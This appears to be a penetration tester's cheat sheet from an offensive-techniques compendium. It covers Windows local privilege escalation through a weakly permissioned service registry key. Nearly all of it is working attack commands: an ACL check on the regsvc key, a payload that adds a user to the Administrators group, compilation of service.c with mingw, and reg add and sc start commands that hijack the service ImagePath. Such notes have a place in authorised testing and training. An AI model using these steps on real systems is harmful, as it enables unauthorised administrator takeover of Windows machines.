killchain-compendium/exploit/windows/service_escalation/service_escalation.md

Service Escalation

• Check service control permission

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

• Add command to system() function inside service.c, e.g. add user to administrators group

cmd.exe /k net localgroup administrators user /add

• Compile via

x86_64-w64-mingw32-gcc service.c service.exe

• Upload to target and

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f
sc start regsvc